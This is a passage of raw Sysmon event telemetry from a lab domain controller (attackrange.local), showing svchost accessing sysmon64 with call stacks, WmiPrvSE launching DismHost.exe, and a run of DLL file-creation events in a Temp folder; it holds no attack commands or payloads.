15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003010Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003009Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003008Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003007Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003006Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003005Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003004Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003003Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7CA0-5FA1-8C00-000000008801}732C:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\DismHost.exe10.0.14393.3241 (rs1_release_inmarket.190910-1801)Dism Host Servicing ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationDismHost.exeC:\Windows\TEMP\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\dismhost.exe {F9AA79DA-F38B-4053-AEBE-C978736C963D}C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=E8007EB8977E83D29F30A122771C09AA,SHA256=33069F383011494299AD95C20D45929D5FC64C0E4E8441C6425F324B02744A20,IMPHASH=734010D3430DBD2CA51B599924FE1424{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding 11241100x80000000000000003002Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-service-winsvc-l1-1-0.dll2020-11-03 15:52:00.729 11241100x80000000000000003001Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-service-private-l1-1-1.dll2020-11-03 15:52:00.729 11241100x80000000000000003000Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-service-private-l1-1-0.dll2020-11-03 15:52:00.729 11241100x80000000000000002999Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-service-management-l2-1-0.dll2020-11-03 15:52:00.729 11241100x80000000000000002998Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-service-management-l1-1-0.dll2020-11-03 15:52:00.729 11241100x80000000000000002997Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-service-core-l1-1-1.dll2020-11-03 15:52:00.729 11241100x80000000000000002996Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-service-core-l1-1-0.dll2020-11-03 15:52:00.729 11241100x80000000000000002995Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-security-sddl-l1-1-0.dll2020-11-03 15:52:00.729 11241100x80000000000000002994Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-security-provider-L1-1-0.dll2020-11-03 15:52:00.729 11241100x80000000000000002993Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.729{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-security-lsapolicy-l1-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002992Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-Security-Lsalookup-L2-1-1.dll2020-11-03 15:52:00.713 11241100x80000000000000002991Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-Security-Lsalookup-L2-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002990Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-security-cryptoapi-l1-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002989Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-security-base-l1-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002988Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-EventLog-Legacy-L1-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002987Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-Eventing-Provider-L1-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002986Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-Eventing-Legacy-L1-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002985Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-Eventing-Controller-L1-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002984Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-eventing-consumer-l1-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002983Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-Eventing-ClassicProvider-L1-1-0.dll2020-11-03 15:52:00.713 11241100x80000000000000002982Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.713{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-devices-config-L1-1-1.dll2020-11-03 15:52:00.713 11241100x80000000000000002981Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-devices-config-L1-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002980Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-core-xstate-l2-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002979Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-xstate-l1-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002978Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-wow64-l1-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002977Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-version-l1-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002976Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-util-l1-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002975Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-url-l1-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002974Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-timezone-l1-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002973Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-threadpool-private-l1-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002972Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-threadpool-legacy-l1-1-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002971Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.698{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-threadpool-l1-2-0.dll2020-11-03 15:52:00.698 11241100x80000000000000002970Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-sysinfo-l1-2-1.dll2020-11-03 15:52:00.682 11241100x80000000000000002969Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-sysinfo-l1-2-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002968Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-sysinfo-l1-1-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002967Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-synch-l1-2-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002966Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-synch-l1-1-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002965Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-stringloader-l1-1-1.dll2020-11-03 15:52:00.682 11241100x80000000000000002964Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-stringansi-l1-1-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002963Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-core-string-obsolete-l1-1-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002962Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-core-string-l2-1-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002961Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-string-l1-1-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002960Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-shutdown-l1-1-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002959Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.682{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-shlwapi-obsolete-l1-1-0.dll2020-11-03 15:52:00.682 11241100x80000000000000002958Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-shlwapi-legacy-l1-1-0.dll2020-11-03 15:52:00.666 11241100x80000000000000002957Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-rtlsupport-l1-1-0.dll2020-11-03 15:52:00.666 11241100x80000000000000002956Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-registry-l2-1-0.dll2020-11-03 15:52:00.666 11241100x80000000000000002955Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-registry-l1-1-0.dll2020-11-03 15:52:00.666 11241100x80000000000000002954Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-realtime-l1-1-0.dll2020-11-03 15:52:00.666 11241100x80000000000000002953Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-profile-l1-1-0.dll2020-11-03 15:52:00.666 